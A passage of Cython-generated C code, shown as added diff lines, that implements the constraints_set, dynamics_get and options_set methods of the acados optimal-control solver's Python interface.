(unlikely(!__pyx_t_1)) __PYX_ERR(0, 611, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_t_6 = __Pyx_PySequence_Tuple(__pyx_t_1); if (unlikely(!__pyx_t_6)) __PYX_ERR(0, 611, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_6); + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + __pyx_t_1 = __Pyx_PyObject_FormatSimple(__pyx_t_6, __pyx_empty_unicode); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 611, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __Pyx_DECREF(__pyx_t_6); __pyx_t_6 = 0; + __pyx_t_11 = (__Pyx_PyUnicode_MAX_CHAR_VALUE(__pyx_t_1) > __pyx_t_11) ? __Pyx_PyUnicode_MAX_CHAR_VALUE(__pyx_t_1) : __pyx_t_11; + __pyx_t_3 += __Pyx_PyUnicode_GET_LENGTH(__pyx_t_1); + __Pyx_GIVEREF(__pyx_t_1); + PyTuple_SET_ITEM(__pyx_t_5, 5, __pyx_t_1); + __pyx_t_1 = 0; + __Pyx_INCREF(__pyx_kp_u_you_have); + __pyx_t_3 += 11; + __Pyx_GIVEREF(__pyx_kp_u_you_have); + PyTuple_SET_ITEM(__pyx_t_5, 6, __pyx_kp_u_you_have); + __pyx_t_1 = __Pyx_PyObject_FormatSimple(__pyx_v_value_shape, __pyx_empty_unicode); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 611, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_t_11 = (__Pyx_PyUnicode_MAX_CHAR_VALUE(__pyx_t_1) > __pyx_t_11) ? __Pyx_PyUnicode_MAX_CHAR_VALUE(__pyx_t_1) : __pyx_t_11; + __pyx_t_3 += __Pyx_PyUnicode_GET_LENGTH(__pyx_t_1); + __Pyx_GIVEREF(__pyx_t_1); + PyTuple_SET_ITEM(__pyx_t_5, 7, __pyx_t_1); + __pyx_t_1 = 0; + __Pyx_INCREF(__pyx_kp_u__7); + __pyx_t_3 += 1; + __Pyx_GIVEREF(__pyx_kp_u__7); + PyTuple_SET_ITEM(__pyx_t_5, 8, __pyx_kp_u__7); + __pyx_t_1 = __Pyx_PyUnicode_Join(__pyx_t_5, 9, __pyx_t_3, __pyx_t_11); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 611, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __Pyx_DECREF(__pyx_t_5); __pyx_t_5 = 0; + + /* "acados_template/acados_ocp_solver_pyx.pyx":610 + * + * if value_shape[0] != dims[0] or value_shape[1] != dims[1]: + * raise Exception(f'AcadosOcpSolverCython.constraints_set(): mismatching dimension' + # <<<<<<<<<<<<<< + * f' for field "{field_}" at stage {stage} with dimension {tuple(dims)} (you have {value_shape})') + * + */ + __pyx_t_5 = __Pyx_PyUnicode_Concat(__pyx_kp_u_AcadosOcpSolverCython_constraint, __pyx_t_1); if (unlikely(!__pyx_t_5)) __PYX_ERR(0, 610, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_5); + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + __pyx_t_1 = __Pyx_PyObject_CallOneArg(((PyObject *)(&((PyTypeObject*)PyExc_Exception)[0])), __pyx_t_5); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 610, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __Pyx_DECREF(__pyx_t_5); __pyx_t_5 = 0; + __Pyx_Raise(__pyx_t_1, 0, 0, 0); + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + __PYX_ERR(0, 610, __pyx_L1_error) + + /* "acados_template/acados_ocp_solver_pyx.pyx":609 + * value = np.asfortranarray(value_) + * + * if value_shape[0] != dims[0] or value_shape[1] != dims[1]: # <<<<<<<<<<<<<< + * raise Exception(f'AcadosOcpSolverCython.constraints_set(): mismatching dimension' + + * f' for field "{field_}" at stage {stage} with dimension {tuple(dims)} (you have {value_shape})') + */ + } + + /* "acados_template/acados_ocp_solver_pyx.pyx":614 + * + * acados_solver_common.ocp_nlp_constraints_model_set(self.nlp_config, \ + * self.nlp_dims, self.nlp_in, stage, field, &value[0][0]) # <<<<<<<<<<<<<< + * + * return + */ + __pyx_t_12 = __Pyx_PyObject_AsString(__pyx_v_field); if (unlikely((!__pyx_t_12) && PyErr_Occurred())) __PYX_ERR(0, 614, __pyx_L1_error) + if (unlikely(!__pyx_v_value.memview)) { __Pyx_RaiseUnboundLocalError("value"); __PYX_ERR(0, 614, __pyx_L1_error) } + __pyx_t_13 = 0; + __pyx_t_14 = 0; + __pyx_t_8 = -1; + if (__pyx_t_13 < 0) { + __pyx_t_13 += __pyx_v_value.shape[0]; + if (unlikely(__pyx_t_13 < 0)) __pyx_t_8 = 0; + } else if (unlikely(__pyx_t_13 >= __pyx_v_value.shape[0])) __pyx_t_8 = 0; + if (__pyx_t_14 < 0) { + __pyx_t_14 += __pyx_v_value.shape[1]; + if (unlikely(__pyx_t_14 < 0)) __pyx_t_8 = 1; + } else if (unlikely(__pyx_t_14 >= __pyx_v_value.shape[1])) __pyx_t_8 = 1; + if (unlikely(__pyx_t_8 != -1)) { + __Pyx_RaiseBufferIndexError(__pyx_t_8); + __PYX_ERR(0, 614, __pyx_L1_error) + } + + /* "acados_template/acados_ocp_solver_pyx.pyx":613 + * f' for field "{field_}" at stage {stage} with dimension {tuple(dims)} (you have {value_shape})') + * + * acados_solver_common.ocp_nlp_constraints_model_set(self.nlp_config, \ # <<<<<<<<<<<<<< + * self.nlp_dims, self.nlp_in, stage, field, &value[0][0]) + * + */ + (void)(ocp_nlp_constraints_model_set(__pyx_v_self->nlp_config, __pyx_v_self->nlp_dims, __pyx_v_self->nlp_in, __pyx_v_stage, __pyx_t_12, ((void *)(&(*((double *) ( /* dim=1 */ (( /* dim=0 */ ((char *) (((double *) __pyx_v_value.data) + __pyx_t_13)) ) + __pyx_t_14 * __pyx_v_value.strides[1]) ))))))); + + /* "acados_template/acados_ocp_solver_pyx.pyx":616 + * self.nlp_dims, self.nlp_in, stage, field, &value[0][0]) + * + * return # <<<<<<<<<<<<<< + * + * + */ + __Pyx_XDECREF(__pyx_r); + __pyx_r = Py_None; __Pyx_INCREF(Py_None); + goto __pyx_L0; + + /* "acados_template/acados_ocp_solver_pyx.pyx":584 + * + * + * def constraints_set(self, int stage, str field_, value_): # <<<<<<<<<<<<<< + * """ + * Set numerical data in the constraint module of the solver. + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_1); + __Pyx_XDECREF(__pyx_t_5); + __Pyx_XDECREF(__pyx_t_6); + __Pyx_XDECREF(__pyx_t_7); + __PYX_XCLEAR_MEMVIEW(&__pyx_t_9, 1); + __Pyx_AddTraceback("acados_template.acados_ocp_solver_pyx.AcadosOcpSolverCython.constraints_set", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = NULL; + __pyx_L0:; + __Pyx_XDECREF(__pyx_v_field); + __PYX_XCLEAR_MEMVIEW(&__pyx_v_value, 1); + __Pyx_XDECREF(__pyx_v_value_shape); + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "acados_template/acados_ocp_solver_pyx.pyx":619 + * + * + * def dynamics_get(self, int stage, str field_): # <<<<<<<<<<<<<< + * """ + * Get numerical data from the dynamics module of the solver: + */ + +/* Python wrapper */ +static PyObject *__pyx_pw_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_41dynamics_get(PyObject *__pyx_v_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +); /*proto*/ +PyDoc_STRVAR(__pyx_doc_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_40dynamics_get, "\n Get numerical data from the dynamics module of the solver:\n\n :param stage: integer corresponding to shooting node\n :param field: string, e.g. 'A'\n "); +static PyMethodDef __pyx_mdef_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_41dynamics_get = {"dynamics_get", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_41dynamics_get, __Pyx_METH_FASTCALL|METH_KEYWORDS, __pyx_doc_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_40dynamics_get}; +static PyObject *__pyx_pw_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_41dynamics_get(PyObject *__pyx_v_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +) { + int __pyx_v_stage; + PyObject *__pyx_v_field_ = 0; + #if !CYTHON_METH_FASTCALL + CYTHON_UNUSED const Py_ssize_t __pyx_nargs = PyTuple_GET_SIZE(__pyx_args); + #endif + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_FASTCALL(__pyx_args, __pyx_nargs); + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + PyObject *__pyx_r = 0; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("dynamics_get (wrapper)", 0); + { + PyObject **__pyx_pyargnames[] = {&__pyx_n_s_stage,&__pyx_n_s_field_2,0}; + PyObject* values[2] = {0,0}; + if (__pyx_kwds) { + Py_ssize_t kw_args; + switch (__pyx_nargs) { + case 2: values[1] = __Pyx_Arg_FASTCALL(__pyx_args, 1); + CYTHON_FALLTHROUGH; + case 1: values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); + CYTHON_FALLTHROUGH; + case 0: break; + default: goto __pyx_L5_argtuple_error; + } + kw_args = __Pyx_NumKwargs_FASTCALL(__pyx_kwds); + switch (__pyx_nargs) { + case 0: + if (likely((values[0] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_stage)) != 0)) kw_args--; + else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 619, __pyx_L3_error) + else goto __pyx_L5_argtuple_error; + CYTHON_FALLTHROUGH; + case 1: + if (likely((values[1] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_field_2)) != 0)) kw_args--; + else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 619, __pyx_L3_error) + else { + __Pyx_RaiseArgtupleInvalid("dynamics_get", 1, 2, 2, 1); __PYX_ERR(0, 619, __pyx_L3_error) + } + } + if (unlikely(kw_args > 0)) { + const Py_ssize_t kwd_pos_args = __pyx_nargs; + if (unlikely(__Pyx_ParseOptionalKeywords(__pyx_kwds, __pyx_kwvalues, __pyx_pyargnames, 0, values + 0, kwd_pos_args, "dynamics_get") < 0)) __PYX_ERR(0, 619, __pyx_L3_error) + } + } else if (unlikely(__pyx_nargs != 2)) { + goto __pyx_L5_argtuple_error; + } else { + values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); + values[1] = __Pyx_Arg_FASTCALL(__pyx_args, 1); + } + __pyx_v_stage = __Pyx_PyInt_As_int(values[0]); if (unlikely((__pyx_v_stage == (int)-1) && PyErr_Occurred())) __PYX_ERR(0, 619, __pyx_L3_error) + __pyx_v_field_ = ((PyObject*)values[1]); + } + goto __pyx_L4_argument_unpacking_done; + __pyx_L5_argtuple_error:; + __Pyx_RaiseArgtupleInvalid("dynamics_get", 1, 2, 2, __pyx_nargs); __PYX_ERR(0, 619, __pyx_L3_error) + __pyx_L3_error:; + __Pyx_AddTraceback("acados_template.acados_ocp_solver_pyx.AcadosOcpSolverCython.dynamics_get", __pyx_clineno, __pyx_lineno, __pyx_filename); + __Pyx_RefNannyFinishContext(); + return NULL; + __pyx_L4_argument_unpacking_done:; + if (unlikely(!__Pyx_ArgTypeTest(((PyObject *)__pyx_v_field_), (&PyUnicode_Type), 1, "field_", 1))) __PYX_ERR(0, 619, __pyx_L1_error) + __pyx_r = __pyx_pf_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_40dynamics_get(((struct __pyx_obj_15acados_template_21acados_ocp_solver_pyx_AcadosOcpSolverCython *)__pyx_v_self), __pyx_v_stage, __pyx_v_field_); + + /* function exit code */ + goto __pyx_L0; + __pyx_L1_error:; + __pyx_r = NULL; + __pyx_L0:; + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static PyObject *__pyx_pf_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_40dynamics_get(struct __pyx_obj_15acados_template_21acados_ocp_solver_pyx_AcadosOcpSolverCython *__pyx_v_self, int __pyx_v_stage, PyObject *__pyx_v_field_) { + PyObject *__pyx_v_field = NULL; + int __pyx_v_dims[2]; + PyArrayObject *__pyx_v_out = 0; + __Pyx_LocalBuf_ND __pyx_pybuffernd_out; + __Pyx_Buffer __pyx_pybuffer_out; + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + PyObject *__pyx_t_1 = NULL; + char const *__pyx_t_2; + PyObject *__pyx_t_3 = NULL; + PyObject *__pyx_t_4 = NULL; + PyObject *__pyx_t_5 = NULL; + PyArrayObject *__pyx_t_6 = NULL; + char const *__pyx_t_7; + char *__pyx_t_8; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("dynamics_get", 0); + __pyx_pybuffer_out.pybuffer.buf = NULL; + __pyx_pybuffer_out.refcount = 0; + __pyx_pybuffernd_out.data = NULL; + __pyx_pybuffernd_out.rcbuffer = &__pyx_pybuffer_out; + + /* "acados_template/acados_ocp_solver_pyx.pyx":626 + * :param field: string, e.g. 'A' + * """ + * field = field_.encode('utf-8') # <<<<<<<<<<<<<< + * + * # get dims + */ + if (unlikely(__pyx_v_field_ == Py_None)) { + PyErr_Format(PyExc_AttributeError, "'NoneType' object has no attribute '%.30s'", "encode"); + __PYX_ERR(0, 626, __pyx_L1_error) + } + __pyx_t_1 = PyUnicode_AsUTF8String(__pyx_v_field_); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 626, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_v_field = __pyx_t_1; + __pyx_t_1 = 0; + + /* "acados_template/acados_ocp_solver_pyx.pyx":630 + * # get dims + * cdef int[2] dims + * acados_solver_common.ocp_nlp_dynamics_dims_get_from_attr(self.nlp_config, self.nlp_dims, self.nlp_out, stage, field, &dims[0]) # <<<<<<<<<<<<<< + * + * # create output data + */ + __pyx_t_2 = __Pyx_PyObject_AsString(__pyx_v_field); if (unlikely((!__pyx_t_2) && PyErr_Occurred())) __PYX_ERR(0, 630, __pyx_L1_error) + ocp_nlp_dynamics_dims_get_from_attr(__pyx_v_self->nlp_config, __pyx_v_self->nlp_dims, __pyx_v_self->nlp_out, __pyx_v_stage, __pyx_t_2, (&(__pyx_v_dims[0]))); + + /* "acados_template/acados_ocp_solver_pyx.pyx":633 + * + * # create output data + * cdef cnp.ndarray[cnp.float64_t, ndim=2] out = np.zeros((dims[0], dims[1]), order='F') # <<<<<<<<<<<<<< + * + * # call getter + */ + __Pyx_GetModuleGlobalName(__pyx_t_1, __pyx_n_s_np); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 633, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_t_3 = __Pyx_PyObject_GetAttrStr(__pyx_t_1, __pyx_n_s_zeros); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 633, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_3); + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + __pyx_t_1 = __Pyx_PyInt_From_int((__pyx_v_dims[0])); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 633, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_t_4 = __Pyx_PyInt_From_int((__pyx_v_dims[1])); if (unlikely(!__pyx_t_4)) __PYX_ERR(0, 633, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_4); + __pyx_t_5 = PyTuple_New(2); if (unlikely(!__pyx_t_5)) __PYX_ERR(0, 633, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_5); + __Pyx_GIVEREF(__pyx_t_1); + PyTuple_SET_ITEM(__pyx_t_5, 0, __pyx_t_1); + __Pyx_GIVEREF(__pyx_t_4); + PyTuple_SET_ITEM(__pyx_t_5, 1, __pyx_t_4); + __pyx_t_1 = 0; + __pyx_t_4 = 0; + __pyx_t_4 = PyTuple_New(1); if (unlikely(!__pyx_t_4)) __PYX_ERR(0, 633, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_4); + __Pyx_GIVEREF(__pyx_t_5); + PyTuple_SET_ITEM(__pyx_t_4, 0, __pyx_t_5); + __pyx_t_5 = 0; + __pyx_t_5 = __Pyx_PyDict_NewPresized(1); if (unlikely(!__pyx_t_5)) __PYX_ERR(0, 633, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_5); + if (PyDict_SetItem(__pyx_t_5, __pyx_n_s_order, __pyx_n_u_F) < 0) __PYX_ERR(0, 633, __pyx_L1_error) + __pyx_t_1 = __Pyx_PyObject_Call(__pyx_t_3, __pyx_t_4, __pyx_t_5); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 633, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; + __Pyx_DECREF(__pyx_t_4); __pyx_t_4 = 0; + __Pyx_DECREF(__pyx_t_5); __pyx_t_5 = 0; + if (!(likely(((__pyx_t_1) == Py_None) || likely(__Pyx_TypeTest(__pyx_t_1, __pyx_ptype_5numpy_ndarray))))) __PYX_ERR(0, 633, __pyx_L1_error) + __pyx_t_6 = ((PyArrayObject *)__pyx_t_1); + { + __Pyx_BufFmt_StackElem __pyx_stack[1]; + if (unlikely(__Pyx_GetBufferAndValidate(&__pyx_pybuffernd_out.rcbuffer->pybuffer, (PyObject*)__pyx_t_6, &__Pyx_TypeInfo_nn___pyx_t_5numpy_float64_t, PyBUF_FORMAT| PyBUF_STRIDES, 2, 0, __pyx_stack) == -1)) { + __pyx_v_out = ((PyArrayObject *)Py_None); __Pyx_INCREF(Py_None); __pyx_pybuffernd_out.rcbuffer->pybuffer.buf = NULL; + __PYX_ERR(0, 633, __pyx_L1_error) + } else {__pyx_pybuffernd_out.diminfo[0].strides = __pyx_pybuffernd_out.rcbuffer->pybuffer.strides[0]; __pyx_pybuffernd_out.diminfo[0].shape = __pyx_pybuffernd_out.rcbuffer->pybuffer.shape[0]; __pyx_pybuffernd_out.diminfo[1].strides = __pyx_pybuffernd_out.rcbuffer->pybuffer.strides[1]; __pyx_pybuffernd_out.diminfo[1].shape = __pyx_pybuffernd_out.rcbuffer->pybuffer.shape[1]; + } + } + __pyx_t_6 = 0; + __pyx_v_out = ((PyArrayObject *)__pyx_t_1); + __pyx_t_1 = 0; + + /* "acados_template/acados_ocp_solver_pyx.pyx":636 + * + * # call getter + * acados_solver_common.ocp_nlp_get_at_stage(self.nlp_config, self.nlp_dims, self.nlp_solver, stage, field, out.data) # <<<<<<<<<<<<<< + * + * return out + */ + __pyx_t_7 = __Pyx_PyObject_AsString(__pyx_v_field); if (unlikely((!__pyx_t_7) && PyErr_Occurred())) __PYX_ERR(0, 636, __pyx_L1_error) + __pyx_t_8 = __pyx_f_5numpy_7ndarray_4data_data(((PyArrayObject *)__pyx_v_out)); if (unlikely(__pyx_t_8 == ((char *)NULL) && PyErr_Occurred())) __PYX_ERR(0, 636, __pyx_L1_error) + ocp_nlp_get_at_stage(__pyx_v_self->nlp_config, __pyx_v_self->nlp_dims, __pyx_v_self->nlp_solver, __pyx_v_stage, __pyx_t_7, ((void *)__pyx_t_8)); + + /* "acados_template/acados_ocp_solver_pyx.pyx":638 + * acados_solver_common.ocp_nlp_get_at_stage(self.nlp_config, self.nlp_dims, self.nlp_solver, stage, field, out.data) + * + * return out # <<<<<<<<<<<<<< + * + * + */ + __Pyx_XDECREF(__pyx_r); + __Pyx_INCREF((PyObject *)__pyx_v_out); + __pyx_r = ((PyObject *)__pyx_v_out); + goto __pyx_L0; + + /* "acados_template/acados_ocp_solver_pyx.pyx":619 + * + * + * def dynamics_get(self, int stage, str field_): # <<<<<<<<<<<<<< + * """ + * Get numerical data from the dynamics module of the solver: + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_1); + __Pyx_XDECREF(__pyx_t_3); + __Pyx_XDECREF(__pyx_t_4); + __Pyx_XDECREF(__pyx_t_5); + { PyObject *__pyx_type, *__pyx_value, *__pyx_tb; + __Pyx_PyThreadState_declare + __Pyx_PyThreadState_assign + __Pyx_ErrFetch(&__pyx_type, &__pyx_value, &__pyx_tb); + __Pyx_SafeReleaseBuffer(&__pyx_pybuffernd_out.rcbuffer->pybuffer); + __Pyx_ErrRestore(__pyx_type, __pyx_value, __pyx_tb);} + __Pyx_AddTraceback("acados_template.acados_ocp_solver_pyx.AcadosOcpSolverCython.dynamics_get", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = NULL; + goto __pyx_L2; + __pyx_L0:; + __Pyx_SafeReleaseBuffer(&__pyx_pybuffernd_out.rcbuffer->pybuffer); + __pyx_L2:; + __Pyx_XDECREF(__pyx_v_field); + __Pyx_XDECREF((PyObject *)__pyx_v_out); + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "acados_template/acados_ocp_solver_pyx.pyx":641 + * + * + * def options_set(self, str field_, value_): # <<<<<<<<<<<<<< + * """ + * Set options of the solver. + */ + +/* Python wrapper */ +static PyObject *__pyx_pw_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_43options_set(PyObject *__pyx_v_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +); /*proto*/ +PyDoc_STRVAR(__pyx_doc_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_42options_set, "\n Set options of the solver.\n\n :param field: string, e.g. 'print_level', 'rti_phase', 'initialize_t_slacks', 'step_length', 'alpha_min', 'alpha_reduction', 'qp_warm_start', 'line_search_use_sufficient_descent', 'full_step_dual', 'globalization_use_SOC', 'qp_tol_stat', 'qp_tol_eq', 'qp_tol_ineq', 'qp_tol_comp', 'qp_tau_min', 'qp_mu0'\n\n :param value: of type int, float, string\n\n - qp_tol_stat: QP solver tolerance stationarity\n - qp_tol_eq: QP solver tolerance equalities\n - qp_tol_ineq: QP solver tolerance inequalities\n - qp_tol_comp: QP solver tolerance complementarity\n - qp_tau_min: for HPIPM QP solvers: minimum value of barrier parameter in HPIPM\n - qp_mu0: for HPIPM QP solvers: initial value for complementarity slackness\n - warm_start_first_qp: indicates if first QP in SQP is warm_started\n "); +static PyMethodDef __pyx_mdef_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_43options_set = {"options_set", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_43options_set, __Pyx_METH_FASTCALL|METH_KEYWORDS, __pyx_doc_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_42options_set}; +static PyObject *__pyx_pw_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_43options_set(PyObject *__pyx_v_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +) { + PyObject *__pyx_v_field_ = 0; + PyObject *__pyx_v_value_ = 0; + #if !CYTHON_METH_FASTCALL + CYTHON_UNUSED const Py_ssize_t __pyx_nargs = PyTuple_GET_SIZE(__pyx_args); + #endif + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_FASTCALL(__pyx_args, __pyx_nargs); + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + PyObject *__pyx_r = 0; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("options_set (wrapper)", 0); + { + PyObject **__pyx_pyargnames[] = {&__pyx_n_s_field_2,&__pyx_n_s_value,0}; + PyObject* values[2] = {0,0}; + if (__pyx_kwds) { + Py_ssize_t kw_args; + switch (__pyx_nargs) { + case 2: values[1] = __Pyx_Arg_FASTCALL(__pyx_args, 1); + CYTHON_FALLTHROUGH; + case 1: values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); + CYTHON_FALLTHROUGH; + case 0: break; + default: goto __pyx_L5_argtuple_error; + } + kw_args = __Pyx_NumKwargs_FASTCALL(__pyx_kwds); + switch (__pyx_nargs) { + case 0: + if (likely((values[0] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_field_2)) != 0)) kw_args--; + else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 641, __pyx_L3_error) + else goto __pyx_L5_argtuple_error; + CYTHON_FALLTHROUGH; + case 1: + if (likely((values[1] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_value)) != 0)) kw_args--; + else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 641, __pyx_L3_error) + else { + __Pyx_RaiseArgtupleInvalid("options_set", 1, 2, 2, 1); __PYX_ERR(0, 641, __pyx_L3_error) + } + } + if (unlikely(kw_args > 0)) { + const Py_ssize_t kwd_pos_args = __pyx_nargs; + if (unlikely(__Pyx_ParseOptionalKeywords(__pyx_kwds, __pyx_kwvalues, __pyx_pyargnames, 0, values + 0, kwd_pos_args, "options_set") < 0)) __PYX_ERR(0, 641, __pyx_L3_error) + } + } else if (unlikely(__pyx_nargs != 2)) { + goto __pyx_L5_argtuple_error; + } else { + values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); + values[1] = __Pyx_Arg_FASTCALL(__pyx_args, 1); + } + __pyx_v_field_ = ((PyObject*)values[0]); + __pyx_v_value_ = values[1]; + } + goto __pyx_L4_argument_unpacking_done; + __pyx_L5_argtuple_error:; + __Pyx_RaiseArgtupleInvalid("options_set", 1, 2, 2, __pyx_nargs); __PYX_ERR(0, 641, __pyx_L3_error) + __pyx_L3_error:; + __Pyx_AddTraceback("acados_template.acados_ocp_solver_pyx.AcadosOcpSolverCython.options_set", __pyx_clineno, __pyx_lineno, __pyx_filename); + __Pyx_RefNannyFinishContext(); + return NULL; + __pyx_L4_argument_unpacking_done:; + if (unlikely(!__Pyx_ArgTypeTest(((PyObject *)__pyx_v_field_), (&PyUnicode_Type), 1, "field_", 1))) __PYX_ERR(0, 641, __pyx_L1_error) + __pyx_r = __pyx_pf_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_42options_set(((struct __pyx_obj_15acados_template_21acados_ocp_solver_pyx_AcadosOcpSolverCython *)__pyx_v_self), __pyx_v_field_, __pyx_v_value_); + + /* function exit code */ + goto __pyx_L0; + __pyx_L1_error:; + __pyx_r = NULL; + __pyx_L0:; + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static PyObject *__pyx_pf_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_42options_set(struct __pyx_obj_15acados_template_21acados_ocp_solver_pyx_AcadosOcpSolverCython *__pyx_v_self, PyObject *__pyx_v_field_, PyObject *__pyx_v_value_) { + PyObject *__pyx_v_int_fields = NULL; + PyObject *__pyx_v_double_fields = NULL; + PyObject *__pyx_v_string_fields = NULL; + PyObject *__pyx_v_field = NULL; + int __pyx_v_int_value; + double __pyx_v_double_value; + __Pyx_memviewslice __pyx_v_string_value = { 0, 0, { 0 }, { 0 }, { 0 } }; + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + PyObject *__pyx_t_1 = NULL; + int __pyx_t_2; + int __pyx_t_3; + PyObject *__pyx_t_4 = NULL; + PyObject *__pyx_t_5 = NULL; + int __pyx_t_6; + char const *__pyx_t_7; + double __pyx_t_8; + __Pyx_memviewslice __pyx_t_9 = { 0, 0, { 0 }, { 0 }, { 0 } }; + Py_ssize_t __pyx_t_10; + PyObject *__pyx_t_11 = NULL; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("options_set", 0); + + /* "acados_template/acados_ocp_solver_pyx.pyx":657 + * - warm_start_first_qp: indicates if first QP in SQP is warm_started + * """ + * int_fields = ['print_level', 'rti_phase', 'initialize_t_slacks', 'qp_warm_start', 'line_search_use_sufficient_descent', 'full_step_dual', 'globalization_use_SOC', 'warm_start_first_qp'] # <<<<<<<<<<<<<< + * double_fields = ['step_length', 'tol_eq', 'tol_stat', 'tol_ineq', 'tol_comp', 'alpha_min', 'alpha_reduction', 'eps_sufficient_descent', + * 'qp_tol_stat', 'qp_tol_eq', 'qp_tol_ineq', 'qp_tol_comp', 'qp_tau_min', 'qp_mu0'] + */ + __pyx_t_1 = PyList_New(8); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 657, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __Pyx_INCREF(__pyx_n_u_print_level); + __Pyx_GIVEREF(__pyx_n_u_print_level); + PyList_SET_ITEM(__pyx_t_1, 0, __pyx_n_u_print_level); + __Pyx_INCREF(__pyx_n_u_rti_phase); + 